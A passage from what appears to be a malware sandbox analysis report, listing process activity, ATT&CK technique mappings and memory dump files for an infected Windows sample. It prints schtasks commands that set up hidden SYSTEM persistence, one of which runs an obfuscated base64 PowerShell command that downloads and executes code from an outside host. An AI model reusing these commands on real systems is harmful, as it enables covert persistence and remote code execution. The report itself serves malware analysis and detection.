    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AdgAuAGIAZQBhAGgAaAAuAGMAbwBtAC8AdgAnACsAJABlAG4AdgA6AFUAUwBFAFIARABPAE0AQQBJAE4AKQA=" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1532
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn oGXmEN /tr "C:\Windows\oGXmEN.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1648
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\olZekr" /tr "c:\windows\xaizGkJb.exe" /F
        5⤵
        Creates scheduled task(s)
        
        PID:1536

C:\Windows\cRwlXoBn.exe
C:\Windows\cRwlXoBn.exe
1⤵
PID:2804

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Account Manipulation

T1098

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Credential Access

Account Manipulation

T1098

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/316-87-0x0000000000000000-mapping.dmp

Download
memory/316-49-0x0000000000000000-mapping.dmp

Download
memory/556-65-0x0000000000000000-mapping.dmp

Download
memory/624-43-0x0000000000000000-mapping.dmp

Download
memory/900-44-0x0000000000000000-mapping.dmp

Download
memory/900-86-0x0000000000000000-mapping.dmp

Download
memory/920-82-0x0000000000000000-mapping.dmp

Download
memory/968-85-0x0000000000000000-mapping.dmp

Download
memory/996-67-0x0000000000000000-mapping.dmp

Download
memory/1168-45-0x0000000000000000-mapping.dmp

Download
memory/1244-80-0x0000000000000000-mapping.dmp

Download
memory/1444-50-0x0000000000000000-mapping.dmp

Download
memory/1500-59-0x00000000024F0000-0x00000000024F1000-memory.dmp

Filesize
4KB

Download
memory/1500-53-0x000007FEF5AC0000-0x000007FEF64AC000-memory.dmp

Filesize
9.9MB

Download
memory/1500-56-0x000000001AA50000-0x000000001AA52000-memory.dmp

Filesize
8KB

Download
memory/1500-57-0x000000001AA54000-0x000000001AA56000-memory.dmp

Filesize
8KB

Download
memory/1500-58-0x00000000027B0000-0x00000000027B1000-memory.dmp

Filesize
4KB

Download
memory/1500-51-0x0000000000000000-mapping.dmp

Download
memory/1500-52-0x000007FEFC2A1000-0x000007FEFC2A3000-memory.dmp

Filesize
8KB

Download
memory/1500-61-0x000000001C2E0000-0x000000001C2E1000-memory.dmp

Filesize
4KB

Download
memory/1500-62-0x000000001AA5A000-0x000000001AA79000-memory.dmp

Filesize
124KB

Download
memory/1500-63-0x00000000546D0000-0x00000000546D1000-memory.dmp

Filesize
4KB

Download
memory/1500-55-0x000000001AAD0000-0x000000001AAD1000-memory.dmp

Filesize
4KB

Download
memory/1500-54-0x00000000020C0000-0x00000000020C1000-memory.dmp

Filesize
4KB

Download
memory/1512-46-0x0000000000000000-mapping.dmp

Download
memory/1516-64-0x0000000000000000-mapping.dmp

Download
memory/1532-91-0x0000000000000000-mapping.dmp

Download
memory/1536-93-0x0000000000000000-mapping.dmp

Download
memory/1556-84-0x0000000000000000-mapping.dmp

Download
memory/1604-48-0x0000000000000000-mapping.dmp

Download
memory/1648-92-0x0000000000000000-mapping.dmp

Download
memory/1740-2-0x0000000000000000-mapping.dmp

Download
memory/1740-6-0x0000000076451000-0x0000000076453000-memory.dmp

Filesize
8KB

Download
memory/1944-69-0x0000000000000000-mapping.dmp

Download
memory/1944-89-0x0000000000000000-mapping.dmp

Download
memory/1992-47-0x0000000000000000-mapping.dmp

Download
memory/2840-70-0x0000000000000000-mapping.dmp

Download
memory/2848-72-0x0000000000000000-mapping.dmp

Download
memory/2892-74-0x0000000000000000-mapping.dmp

Download
memory/2920-77-0x0000000000000000-mapping.dmp

Download
memory/2976-75-0x0000000000000000-mapping.dmp

Download
memory/3052-79-0x0000000000000000-mapping.dmp

Download